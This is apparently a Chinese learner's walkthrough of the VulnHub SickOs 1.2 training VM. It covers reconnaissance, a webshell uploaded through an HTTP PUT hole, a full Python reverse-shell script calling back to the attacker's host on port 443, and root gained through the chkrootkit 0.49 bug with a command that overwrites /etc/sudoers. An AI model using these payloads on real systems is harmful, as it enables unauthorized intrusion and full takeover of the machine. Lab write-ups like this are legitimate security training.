vulhub靶场学习日记SickOs1.2

SickOs1.2靶机渗透

目的：root权限拿flag

靶场地址：SickOs: 1.2 ~ VulnHubSickOs: 1.2, made by D4rk. Download & walkthrough links are available.https://www.vulnhub.com/entry/sickos-12,144/

地址：https://www.vulnhub.com/entry/sickos-12,144/

选择第二个mirror

Vm打开ovf文件，网络模式我选择的是nat

开整

Kali ip地址

Nmap扫描靶机

Nmap扫描靶机端口

Dirb扫描目录

Whatweb指纹识别

网站打开啥也没有，就一张图片，tset目录也没有啥东西

Lighttpd 1.4.28上网搜漏洞没啥结果

Nmap使用脚本对/test目录扫描一下，这里使用nmap自带的脚本扫描

nmap --script http-methods --script-args http-methods.url-path='/test' 192.168.192.132

发现存在put任意写漏洞，直接抓包改put方式上传木马

发现访问成功

思路:上传一句话木马，蚁剑连接，上传反弹shell

蚁剑连接成功

上传shell.py反弹shell文件

import socket,subprocess,os

s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)

s.connect(("192.168.192.129",443))

os.dup2(s.fileno(),0)

os.dup2(s.fileno(),1)

os.dup2(s.fileno(),2)

p=subprocess.call(["/bin/bash","-i"])

Python运行该文件

Kali监听443端口，反弹成功

Whoami

Pwd

Uanme -a

后面没太大思路，看了一下大佬wp，是通过执行任务提权

查看自动执行任务

发现chkrootkit任务，查看版本

搜索一下刚好有这个漏洞

searchsploit chkrootkit 0.49 

查看33899.txt文件

cat /usr/share/exploitdb/exploits/linux/local/33899.txt  

创建文件

给予执行权限

echo 'chmod +w /etc/sudoers && echo "www-data ALL=(ALL)  NOPASSWD:ALL" > /etc/sudoers' > /tmp/update

user1 ALL=(ALL) ALL

我们来说一下这一行的配置的意思

user1 表示该用户user1可以使用sudo命令，第一个ALL指的是网络中的主机（可以是主机名也可以是ip地址），它指明user1用户可以在此主机上执行后面命令；第二个括号里的ALL是指目标用户，也就是以谁的身份去执行命令。最后一个ALL是指命令路径。

Sudo切换root，找到flag

还是太菜了，思路狭窄